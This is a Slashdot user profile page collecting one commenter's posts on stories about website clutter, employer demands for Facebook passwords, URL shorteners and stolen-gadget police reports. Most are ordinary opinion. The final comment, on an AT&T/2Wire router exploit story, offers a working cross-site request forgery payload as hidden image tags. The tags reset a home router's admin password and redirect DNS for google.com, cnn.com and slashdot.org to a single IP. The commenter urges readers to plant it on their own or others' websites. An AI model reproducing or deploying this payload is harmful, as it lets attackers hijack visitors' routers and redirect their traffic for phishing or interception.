Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Comments

top

Why Your IT Spending Is About To Hit the Wall

BlueUnderwear Re:I know what you're talking about (301 comments)

But it's not just slashdot. ALL websites are bum rushing the add more crap idea.

Correct. But as a geek site, slashdot should know better and lead by example.

And yes, other companies do look towards (perceived) geek sites such as slashdot, gnu.org and redhat.com in order to justify their own inadequacies. A while back, our company was putting a new website online, which had huge horse blinkers. When I pointed this out to the webmasters, their response was yeah, but just look your geek friends at gnu.org (which indeed had small blinkers at the time) and redhat.com (which is just fugly).

The situation has become so bad that even the pirate party has sites where half the links won't work, where the only way to make a donation is Paypal (even though most potential donators are local, and could use an IBAN bank account number).

So, slashdot, digg, heise.de, freshmeat, gnu.org, redhat: cut down on the crap, it's not only your own sites that you are littering, but the internet as a whole! Or, if you're actually enjoying turning the Internet into a landfill, then please stop the hypocrisy of posting articles complaining about it.

more than 2 years ago
top

Teacher's Aide Fired For Refusing To Hand Over Facebook Password

BlueUnderwear Re:The battle now begins. (407 comments)

And indeed:

  1. The threat must be of serious bodily harm or death
  2. The threatened harm must be greater than the harm caused by the crime
  3. The threat must be immediate and inescapable
  4. The defendant must have become involved in the situation through no fault of his or her own

more than 2 years ago
top

Teacher's Aide Fired For Refusing To Hand Over Facebook Password

BlueUnderwear Re:The battle now begins. (407 comments)

If the school were to log in to the victim's Facebook account using a password that was extracted under duress, that should rise to any court's definition of "unauthorized access to a computer system," or whatever the relevant laws say. The user simply doesn't have the authority to grant "authorized access" -- only Facebook can do that.

Even if the user would have authority to grant access to third parties, trying to extract that access under duress would still be a crime. The real question is whether the threat of loss of employment counts as duress, or whether duress has to be a physical threat against life or health, such as a gun pointed to user's head.

more than 2 years ago
top

Teacher's Aide Fired For Refusing To Hand Over Facebook Password

BlueUnderwear Re:The battle now begins. (407 comments)

they have no contract with the company, so they cannot forbid them to do so. But they can forbid their clients to give away login credentials.

But the company interferes with a contract that Facebook has with its end user. And tortuous interference is an actionable claim:

Tortious interference with contract rights can occur where the tortfeasor (employer) convinces a party (employee=facebook user) to breach the contract against the plaintiff (facebook)

more than 2 years ago
top

Is the Web Heading Toward Redirect Hell?

BlueUnderwear Re:How do you get offenders to stop? (321 comments)

You instantly kill any reason for the redirect to be there (their counts will no longer be accurate).

Although URL shortening services are often abused to do invasive statistics, that's not the only reason why they exist...

You know, some people still use them to shorten URLs (like how else would you fit a long google maps URL into a short twitter message?)

more than 3 years ago
top

Is the Web Heading Toward Redirect Hell?

BlueUnderwear Re:How do you get offenders to stop? (321 comments)

It's like understanding the difference between top speed and acceleration

More like the difference between a sports car and a truck.

The sports car gets you faster to your destination (low latency), but the truck allows you to haul more stuff (high bandwidth).

more than 3 years ago
top

Detecting Anonymously Registered Domains

BlueUnderwear Re:Stupid (97 comments)

On the other hand, how many people put up their DOB on their websites?

May I remind you that Facebook is a website too?

more than 4 years ago
top

Tracking Stolen Gadgets — Manufacturers' New Dilemma

BlueUnderwear Re:how would you prove (250 comments)

I'm telling you that walking in any busy police department in any city bigger than 100,000 people and asking for signatures on paper so that you can force Amazon to do something is a fools errand.

Not true. My father successfully got a police report in Lisbon (564657 inhabitants) for a stolen wallet, which contained far less than $300. And there was a huge queue, so it's not as if the police were underworked either.

about 5 years ago
top

Tracking Stolen Gadgets — Manufacturers' New Dilemma

BlueUnderwear Re:Street justice? (250 comments)

Third: At what price level is Police involvement warranted? Its not exactly Grand Theft Kindle you know. Cops have a few more important things to do.

But they should a least do a report, which you can then use for your travel insurance, or (in this case) for Amazon. And here in Europe, Police usually do take the time to do a report, even for trivial thefts or losses (even if no investigation follows... but in this case, all you need is the report number).

Fifth: Cellphone companies in Europe do put stolen phones on a list. They can't be activated.

Not true, at least not in Luxembourg. A friend of mine got his cellphone stolen, he reported it to the police, but they claimed that although technically possible to block and locate it (by its IMEI number), it was policy that this was not done for a mere theft... (you'd have to wonder in what circumstances they would actually use the feature).

about 5 years ago
top

Tracking Stolen Gadgets — Manufacturers' New Dilemma

BlueUnderwear Re:Seems Sensible (250 comments)

You've apparently never tried to report a stolen wallet or backpack, or even modest laptop. You fill out forms, answer questions,a nd they do _nothing_. It's just not important enough.

But at least you get the report form, needed to claim damages from your insurance company.

And if the stolen item does happen to fall into their lap, you do get it back. Case in point: my father got his wallet stolen in Lissabon, reported it to the police, and a couple of months later, he got it back.

What happens usually with wallets is that the thieves are "only" interested in the cash, and throw away the wallet (along with papers "useless" to them) as soon as possible (because it's dangerous to them to have id papers on them, which are not theirs). Eventually, somebody finds the wallet (because the thiefs don't bother with properly putting it into the trash, but rather throw it into the nearest bush or whatever), and brings it to the police... which then can send it back to you, if they've got a report on file.

about 5 years ago
top

AT&T, 2Wire Ignoring Active Security Exploit [Updated]

BlueUnderwear If you have a website, paste the following code (134 comments)

Thanks so much for that URL.

If you want to join into the phun, put the following onto your website (or onto somebody else's website, if he happens to still use IIS):

<img src="http://192.168.1.254/xslt?PAGE=H04_POST&amp;PASSWORD=admin&amp;PASSWORD_CONF=admin" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=google.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.google.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=cnn.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.cnn.com&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=slashdot.org&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>
<img src="http://192.168.1.254/xslt?PAGE=J38_SET&amp;THISPAGE=J38&amp;NEXTPAGE=J38_SET&amp;NAME=www.slashdot.org&amp;ADDR=158.64.72.228" width="1" height="1" alt="haha"/>

more than 6 years ago

Submissions

BlueUnderwear hasn't submitted any stories.

Journals

BlueUnderwear has no journal entries.

Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>